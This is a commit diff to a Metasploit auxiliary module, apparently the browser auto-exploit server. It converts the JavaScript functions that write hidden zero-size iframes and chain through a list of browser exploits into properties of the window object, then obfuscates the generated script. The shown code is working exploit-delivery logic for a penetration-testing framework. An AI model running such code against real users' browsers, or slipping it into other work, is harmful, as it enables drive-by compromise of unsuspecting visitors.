Move next_exploit() onto window object so it's accessible everywhere
I swear I committed this before, not sure what happened.
This commit is contained in:
parent
9ae9509cfe
commit
f520af036f
|
@ -706,7 +706,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
# Generic stuff that is needed regardless of what browser was detected.
|
# Generic stuff that is needed regardless of what browser was detected.
|
||||||
js << <<-ENDJS
|
js << <<-ENDJS
|
||||||
var written_iframes = new Array();
|
var written_iframes = new Array();
|
||||||
function write_iframe(myframe) {
|
window.write_iframe = function (myframe) {
|
||||||
var iframe_idx; var mybody;
|
var iframe_idx; var mybody;
|
||||||
for (iframe_idx in written_iframes) {
|
for (iframe_idx in written_iframes) {
|
||||||
if (written_iframes[iframe_idx] == myframe) {
|
if (written_iframes[iframe_idx] == myframe) {
|
||||||
|
@ -718,7 +718,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
str += '<iframe src="' + myframe + '" style="visibility:hidden" height="0" width="0" border="0"></iframe>';
|
str += '<iframe src="' + myframe + '" style="visibility:hidden" height="0" width="0" border="0"></iframe>';
|
||||||
document.body.innerHTML += (str);
|
document.body.innerHTML += (str);
|
||||||
}
|
}
|
||||||
function next_exploit(exploit_idx) {
|
window.next_exploit = function (exploit_idx) {
|
||||||
#{js_debug("'next_exploit(' + exploit_idx +')'")}
|
#{js_debug("'next_exploit(' + exploit_idx +')'")}
|
||||||
if (!global_exploit_list[exploit_idx]) {
|
if (!global_exploit_list[exploit_idx]) {
|
||||||
#{js_debug("'End'")}
|
#{js_debug("'End'")}
|
||||||
|
@ -745,15 +745,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
if (eval(test)) {
|
if (eval(test)) {
|
||||||
#{js_debug("'test says it is vuln, writing iframe for ' + global_exploit_list[exploit_idx].resource + '<br>'")}
|
#{js_debug("'test says it is vuln, writing iframe for ' + global_exploit_list[exploit_idx].resource + '<br>'")}
|
||||||
write_iframe(global_exploit_list[exploit_idx].resource);
|
window.write_iframe(global_exploit_list[exploit_idx].resource);
|
||||||
setTimeout("next_exploit(" + (exploit_idx+1).toString() + ")", 1000);
|
setTimeout("window.next_exploit(" + (exploit_idx+1).toString() + ")", 1000);
|
||||||
} else {
|
} else {
|
||||||
#{js_debug("'this client does not appear to be vulnerable to ' + global_exploit_list[exploit_idx].resource + '<br>'")}
|
#{js_debug("'this client does not appear to be vulnerable to ' + global_exploit_list[exploit_idx].resource + '<br>'")}
|
||||||
next_exploit(exploit_idx+1);
|
window.next_exploit(exploit_idx+1);
|
||||||
}
|
}
|
||||||
} catch(e) {
|
} catch(e) {
|
||||||
#{js_debug("'test threw an exception: ' + e.message + '<br />'")}
|
#{js_debug("'test threw an exception: ' + e.message + '<br />'")}
|
||||||
next_exploit(exploit_idx+1);
|
window.next_exploit(exploit_idx+1);
|
||||||
};
|
};
|
||||||
}
|
}
|
||||||
ENDJS
|
ENDJS
|
||||||
|
@ -832,8 +832,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
js << %Q|noscript_div.innerHTML = unescape(noscript_exploits);\n|
|
js << %Q|noscript_div.innerHTML = unescape(noscript_exploits);\n|
|
||||||
js << %Q|document.body.appendChild(noscript_div);\n|
|
js << %Q|document.body.appendChild(noscript_div);\n|
|
||||||
|
|
||||||
js << "#{js_debug("'starting exploits<br>'")}\n"
|
js << "#{js_debug("'starting exploits (' + global_exploit_list.length + ' total)<br>'")}\n"
|
||||||
js << "next_exploit(0);\n"
|
js << "window.next_exploit(0);\n"
|
||||||
|
|
||||||
js = ::Rex::Exploitation::JSObfu.new(js)
|
js = ::Rex::Exploitation::JSObfu.new(js)
|
||||||
js.obfuscate
|
js.obfuscate
|
||||||
|
|
Loading…
Reference in New Issue